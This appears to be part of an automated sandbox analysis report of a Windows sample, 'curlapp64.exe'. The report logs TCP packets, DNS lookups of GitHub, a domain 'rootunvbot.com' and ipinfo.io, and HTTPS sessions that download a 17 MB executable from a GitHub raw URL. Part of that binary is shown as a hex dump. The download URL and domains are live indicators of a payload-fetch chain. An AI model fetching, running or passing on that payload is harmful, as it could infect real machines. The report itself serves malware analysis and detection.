                                                                                                                              Dec 10, 2024 07:35:33.025186062 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.025193930 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.025240898 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.028808117 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.028829098 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.028903008 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.028920889 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.028974056 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.031744003 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.031763077 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.031826019 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.031846046 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.031923056 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.035329103 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.035356998 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.035437107 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.035444975 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.035469055 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.035506010 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.042865038 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.042897940 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.042972088 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.042982101 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.043097019 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.046592951 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.046622038 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.046721935 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.046730995 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.046775103 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.070207119 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.070238113 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.070367098 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.070395947 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.070440054 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.074507952 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.074526072 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.074625015 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.074635029 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.074676037 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.079528093 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.079549074 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.079638004 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.079658985 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.079695940 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.084511995 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.084534883 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.084594965 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.084606886 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.084646940 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.089451075 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.089468956 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.089564085 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.089580059 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.089620113 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.094137907 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.094161987 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.094235897 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.094249010 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.094291925 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.128808975 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.128839970 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.129024029 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.129050970 CET44349770185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.129102945 CET49770443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.136653900 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.136677027 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.136766911 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.136780024 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.138008118 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.144341946 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.144383907 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.144561052 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.144572973 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.144630909 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.151052952 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.151072025 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.151184082 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.151196003 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.151247025 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.158674002 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.158694983 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.158765078 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.158773899 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.162028074 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.162182093 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.162213087 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.162244081 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.162267923 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.162281036 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.162307978 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.166253090 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.166273117 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.166352987 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.166366100 CET44349743185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.166712999 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.166738033 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.166944027 CET49720443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.166956902 CET44349720185.199.109.133192.168.2.5
                                                                                                                              Dec 10, 2024 07:35:33.166981936 CET49743443192.168.2.5185.199.109.133
                                                                                                                              Dec 10, 2024 07:35:33.166996956 CET49720443192.168.2.5185.199.109.133

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 10, 2024 07:34:56.158107042 CET192.168.2.51.1.1.10xdb06Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:35:07.523524046 CET192.168.2.51.1.1.10x76e2Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:36:54.513638020 CET192.168.2.51.1.1.10x62aeStandard query (0)rootunvbot.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:36:59.516743898 CET192.168.2.51.1.1.10xd783Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 10, 2024 07:34:56.297882080 CET1.1.1.1192.168.2.50xdb06No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:35:07.660655022 CET1.1.1.1192.168.2.50x76e2No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:35:07.660655022 CET1.1.1.1192.168.2.50x76e2No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:35:07.660655022 CET1.1.1.1192.168.2.50x76e2No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:35:07.660655022 CET1.1.1.1192.168.2.50x76e2No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:36:54.747090101 CET1.1.1.1192.168.2.50x62aeNo error (0)rootunvbot.com188.116.21.204A (IP address)IN (0x0001)false
                                                                                                                              Dec 10, 2024 07:36:59.654772043 CET1.1.1.1192.168.2.50xd783No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.54971220.233.83.1454434820C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:06 UTC88OUTHEAD /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: github.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:07 UTC549INHTTP/1.1 302 Found
                                                                                                                              Server: GitHub.com
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                              Access-Control-Allow-Origin:
                                                                                                                              Location: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              2024-12-10 06:35:07 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.549715185.199.109.1334434820C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:08 UTC99OUTHEAD /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:09 UTC904INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 17375232
                                                                                                                              Cache-Control: max-age=300
                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              ETag: "7cbcbacbd0e618085a41fd0edfbf97987a034ec2cc9fcab6a684b93b3c831467"
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-GitHub-Request-Id: A214:3389B3:301995:359EEE:6757E11C
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:09 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-ewr-kewr1740059-EWR
                                                                                                                              X-Cache: MISS
                                                                                                                              X-Cache-Hits: 0
                                                                                                                              X-Timer: S1733812509.156931,VS0,VE161
                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              X-Fastly-Request-ID: b26ddc3cb3974525fa1d407a21be020f51a658b5
                                                                                                                              Expires: Tue, 10 Dec 2024 06:40:09 GMT
                                                                                                                              Source-Age: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.54971920.233.83.1454434820C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:11 UTC87OUTGET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: github.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:11 UTC549INHTTP/1.1 302 Found
                                                                                                                              Server: GitHub.com
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                              Access-Control-Allow-Origin:
                                                                                                                              Location: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              2024-12-10 06:35:11 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.549720185.199.109.1334434820C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:13 UTC98OUTGET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:13 UTC901INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 17375232
                                                                                                                              Cache-Control: max-age=300
                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              ETag: "7cbcbacbd0e618085a41fd0edfbf97987a034ec2cc9fcab6a684b93b3c831467"
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-GitHub-Request-Id: A214:3389B3:301995:359EEE:6757E11C
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:13 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-ewr-kewr1740027-EWR
                                                                                                                              X-Cache: HIT
                                                                                                                              X-Cache-Hits: 0
                                                                                                                              X-Timer: S1733812513.294856,VS0,VE1
                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              X-Fastly-Request-ID: aa84f1579fe42c7c97235eec18e1957ae8f6616c
                                                                                                                              Expires: Tue, 10 Dec 2024 06:40:13 GMT
                                                                                                                              Source-Age: 4
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f f7 f9 e3 7b 96 97 b0 7b 96 97 b0 7b 96 97 b0 09 17 96 b1 7e 96 97 b0 7b 96 96 b0 6a 96 97 b0 f8 10 92 b1 7a 96 97 b0 f8 10 94 b1 7a 96 97 b0 f8 10 97 b1 7a 96 97 b0 f8 10 95 b1 7a 96 97 b0 52 69 63 68 7b 96 97 b0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 ec 70 55 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 2a 00 2a 00 00 00 f2 08 01 00 00 00 00 20 24 00 00 00 10 00
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{{{~{jzzzzRich{PEdpUg" ** $
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 46 fd 88 4e f4 0f b6 4e f5 88 46 f5 0f b6 46 01 88 4e fd 0f b6 4e f9 88 46 f9 0f b6 46 fa 88 4e 01 0f b6 4e f6 88 46 f6 0f b6 46 fe 88 46 fa 0f b6 46 02 88 46 fe 88 4e 02 0f 1f 44 00 00 49 8b c8 ba 04 00 00 00 0f 1f 84 00 00 00 00 00 0f b6 01 48 8d 49 04 42 0f b6 04 18 88 41 fc 48 83 ea 01 75 eb 49 ff c0 49 83 e9 01 75 d2 44 0f b6 c5 48 8b c3 49 c1 e0 04 41 b9 04 00 00 00 4c 2b c3 4c 03 c7 66 66 66 0f 1f 84 00 00 00 00 00 ba 04 00 00 00 66 66 66 0f 1f 84 00 00 00 00 00 41 0f b6 0c 00 30 08 48 ff c0 48 83 ea 01 75 f0 49 83 e9 01 75 da 40 84 ed 74 18 48 8b cb e8 1d 01 00 00 40 80 c5 ff 4c 8d 1d 32 31 00 00 e9 0d ff ff ff b9 10 00 00 00 0f 1f 84 00 00 00 00 00 41 0f b6 04 1f 30 03 48 8d 5b 01 48 83 e9 01 75 ef 0f b6 84 24 80 00 00 00 48 83 c6 10 88 87 b1 00
                                                                                                                              Data Ascii: FNNFFNNFFNNFFFFFNDIHIBAHuIIuDHIAL+LffffffA0HHuIu@tH@L21A0H[Hu$H
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 0f b6 b4 16 60 42 00 00 49 8d 57 fe 42 0f b6 b4 15 60 42 00 00 42 0f b6 ac 13 60 42 00 00 48 c1 ea 02 42 0f b6 9c 12 60 44 00 00 43 32 9c 11 60 42 00 00 46 8d 04 ad f0 ff ff ff 41 32 1c 08 41 8d 40 01 42 8d 3c ad 00 00 00 00 44 0f b6 cb 88 1c 0f 44 32 34 08 8d 47 01 44 88 34 08 45 0f b6 e6 41 8d 40 02 40 32 34 08 8d 47 02 40 88 34 08 44 0f b6 d6 41 8d 40 03 40 32 2c 08 8d 47 03 40 88 2c 08 44 0f b6 dd 41 8d 45 01 a8 03 75 4a 4c 8d 05 a6 e8 ff ff 40 0f b6 c6 49 8d 57 ff 48 c1 ea 02 46 0f b6 a4 00 60 42 00 00 40 0f b6 c5 46 0f b6 8c 02 60 44 00 00 46 0f b6 94 00 60 42 00 00 0f b6 c3 46 0f b6 9c 00 60 42 00 00 41 0f b6 c6 46 32 8c 00 60 42 00 00 8d 47 04 46 8d 04 ad f4 ff ff ff 45 32 0c 08 44 88 0c 08 41 8d 40 01 44 32 24 08 8d 47 05 44 88 24 08 41 8d 40 02
                                                                                                                              Data Ascii: `BIWB`BB`BHB`DC2`BFA2A@B<DD24GD4EA@@24G@4DA@@2,G@,DAEuJL@IWHF`B@F`DF`BF`BAF2`BGFE2DA@D2$GD$A@
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 48 89 43 50 49 8b 45 08 48 89 43 58 48 b8 00 00 00 00 00 10 00 00 48 c7 43 68 0a 00 02 00 48 c7 43 70 08 00 00 00 48 89 73 78 48 89 44 24 78 48 8d 44 24 78 48 89 83 98 00 00 00 48 8b 45 78 48 c7 83 88 00 00 00 10 00 02 00 48 c7 83 90 00 00 00 08 00 00 00 48 85 c0 74 1f 48 c7 83 a8 00 00 00 00 00 06 00 48 c7 83 b0 00 00 00 08 00 00 00 48 89 83 b8 00 00 00 eb 04 48 83 03 e0 33 c0 48 89 5c 24 50 0f 57 c0 48 89 45 10 0f 11 45 c0 48 8d 45 c0 48 c7 45 c0 58 00 00 00 48 89 44 24 48 48 8d 54 24 70 48 8b 44 24 60 48 8d 4c 24 68 48 89 44 24 40 41 b9 00 00 00 02 44 89 64 24 38 48 8d 45 88 44 89 64 24 30 45 8b c1 48 89 44 24 28 48 8d 45 88 0f 11 45 d0 48 89 44 24 20 0f 11 45 e0 44 89 65 c8 0f 11 45 f0 c7 45 d0 01 00 00 00 0f 11 45 00 4c 89 64 24 68 4c 89 64 24 70 e8
                                                                                                                              Data Ascii: HCPIEHCXHHChHCpHsxHD$xHD$xHHExHHHtHHHH3H\$PWHEEHEHEXHD$HHT$pHD$`HL$hHD$@ADd$8HEDd$0EHD$(HEEHD$ EDeEEELd$hLd$p
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 44 24 70 01 00 00 00 c7 44 24 74 51 fd 31 e9 48 89 75 80 c7 45 88 01 00 00 00 c7 45 8c 3f 3e 44 b5 48 89 75 98 c7 45 a0 01 00 00 00 c7 45 a4 92 59 18 40 48 89 75 b0 c7 45 b8 01 00 00 00 c7 45 bc 2e b3 3f 8a 48 89 75 c8 89 75 d0 c7 45 d4 2f 4d 75 13 48 89 75 d8 89 75 e8 c7 45 ec ac da f9 52 48 89 75 f0 89 75 00 c7 45 04 30 fa 79 b7 48 89 75 08 89 75 18 c7 45 1c e9 2e 6f 1c 48 89 75 20 89 75 30 c7 45 34 58 fd e2 09 48 89 75 38 89 75 48 c7 45 4c 7b fa 26 a5 48 89 75 50 4d 85 ff 75 17 be ff ff ff ff 8b c6 48 81 c4 78 04 00 00 41 5f 41 5e 5f 5e 5b 5d c3 49 63 4f 3c 48 8d 85 70 02 00 00 49 03 cf 4c 89 a4 24 70 04 00 00 48 8d 80 80 00 00 00 4c 89 ac 24 68 04 00 00 44 8b f6 8b fe 0f 10 41 18 0f 10 49 28 0f 11 40 80 0f 10 41 38 0f 11 48 90 0f 10 49 48 0f 11 40 a0
                                                                                                                              Data Ascii: D$pD$tQ1HuEE?>DHuEEY@HuEE.?HuuE/MuHuuERHuuE0yHuuE.oHu u0E4XHu8uHEL{&HuPMuHxA_A^_^[]IcO<HpIL$pHL$hDAI(@A8HIH@
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 05 b1 1a 00 00 e8 2c f7 ff ff f3 0f 7e 0d 94 29 00 00 0f 57 c0 f3 0f 7e 15 91 29 00 00 b9 10 00 00 00 66 0f 60 c8 66 0f 60 d0 f3 0f 7f 4d b0 f3 0f 7f 55 c0 66 90 0f b6 04 19 66 89 44 4d b0 48 ff c1 48 83 f9 14 72 ee 48 8d 1d 77 29 00 00 ba 50 01 00 00 48 8b cb 4c 8d 0d b8 1a 00 00 4c 8d 05 91 1a 00 00 e8 cc f6 ff ff 48 8b cf 66 0f 1f 84 00 00 00 00 00 f3 0f 7e 0c 19 0f 57 c0 66 0f 60 c8 f3 0f 7f 8c 4d 90 00 00 00 f3 0f 7e 4c 19 08 66 0f 60 c8 f3 0f 7f 8c 4d a0 00 00 00 f3 0f 7e 4c 19 10 66 0f 60 c8 f3 0f 7f 8c 4d b0 00 00 00 f3 0f 7e 4c 19 18 66 0f 60 c8 f3 0f 7f 8c 4d c0 00 00 00 48 83 c1 20 48 81 f9 40 01 00 00 72 a5 48 81 f9 4b 01 00 00 73 24 0f 1f 40 00 0f 1f 84 00 00 00 00 00 0f b6 04 19 66 89 84 4d 90 00 00 00 48 ff c1 48 81 f9 4b 01 00 00 72 e8 65
                                                                                                                              Data Ascii: ,~)W~)f`f`MUffDMHHrHw)PHLLHf~Wf`M~Lf`M~Lf`M~Lf`MH H@rHKs$@fMHHKre
